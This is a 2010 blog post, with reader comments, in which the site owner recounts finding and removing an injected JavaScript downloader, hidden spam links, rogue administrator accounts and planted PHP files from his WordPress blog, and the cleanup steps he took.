It appears that I’ve plugged the leak that was causing this blog to be hacked. I hope.
It began on Friday morning, when I received an email from “Linuxlove” who wrote:
Tried going to your blog to read the latest Wambooli news but all of the Wambooli blog is cut off by AVG which claims that your blog has a virus “JS/Downloader.Agent”.
And it did! I dumped the raw version of the blog’s homepage and saw the telltale signs of the JS/Downloader.
JS/Downloader is a chunk of Javascript code that’s encrypted, appearing as several lines of hexadecimal numbers or sometimes a long string of values. Then there are a few lines to process that code.
The processed code becomes HTML instructions that redirects the page to somewhere else on the Internet. Somewhere nasty.
There were also about 250 links added with the hack, invisible links, links that went out to various pirate sites for downloading movies.
I use WordPress for my blog, though I’ve customized it somewhat. I saw that the JS/Downloader was installed in the Header file, so it was easy to remove the malicious code.
Friday evening, however, the JS/Downloader script was re-installed. I removed it again and took a more serious look at what could be causing it.
The first thing I noticed was that two users on the blog had been promoted to Administrator status. They were probably bots, but who knows? I deleted the users and the problems have stopped. So far.
I’ve also changed all the passwords used by the site, as well as the site’s security keys. The only further step I can take should the attack repeat itself, is to re-install all the software from a fresh version. I am poised to do that should another attack happen — especially because I have no ideas how the users were able to gain administrator access. It might be an exploit that’s still vulnerable.
I’d like to thank Linuxlove for sending me the email and pointing out the compromised site. According to the HoneyGrid report:
71% of Web sites with malicious code are legitimate sites that have been compromised.
It is my hope that the Wambooli blog never become one of that 71 percent.
So uh, if I hadn’t emailed you we all would have had viruses by now?
“It is my that the Wambooli blog never become one of that 71 percent.”
It’s my hope that my site, forums and IRC chat don’t become malicious sites too.
offtopic: yay top-level domain. yay to finding out that you can’t restart apache2 on anything else other than the host computer. yay for phpBB. yay for me going on and on…
Comment by linuxlove — February 8, 2010 @ 6:59 am
It would have taken a bit longer for me to discover the infection, my friend. Your timing was perfect, though, as I believe you emailed me probably 45 minutes after the site was hacked. The JS/Downloader is an older hack and if you’ve been keeping your web browsers up-to-date, then it probably wouldn’t have infected anyone. On my Mac, it merely redirected me to a fake Yahoo-like web page where I could download lots of “free” movies.
I also have implemented a few toys on the site now that alert me whenever something is changed by someone other than myself. That may work, but only time will tell.
Comment by admin — February 8, 2010 @ 7:08 am
I also have to ask, why is the copyright held by “Quantum Particle Bottling Co.”? Is it just you making a joke or something?
Comment by linuxlove — February 8, 2010 @ 9:12 am
QPBC is my company. The copyright is my right to limit reproduction of my material, which may or may not work. I hosted an image of one of my cars on Wambooli a long, long time ago. The same image was used by a car dealer in another state. A simple letter informing them of the copyright violation was enough to get them to remove the image, though I also made him the offer to pay me for use of the image. He declined.
Comment by admin — February 8, 2010 @ 10:25 am
Spoke too soon! Another hack today. My scanning program caught the modification in just 9 minutes, so I was able to fix things. I’ve also reinstalled the entire site, including WordPress and the databases from scratch. That took just under an hour.
This is getting annoying…
Comment by admin — February 9, 2010 @ 3:34 pm
Okay. I’m sure I got it now. I just found a file named
wp-inclode.phphidden in this blog’s uploads folder. A companion file,fotter.php, was also found. Apparently that’s an old exploit for WordPress. I’m glad that I caught them, and I believe that should be the end of the hacking adventure!Comment by admin — February 9, 2010 @ 4:23 pm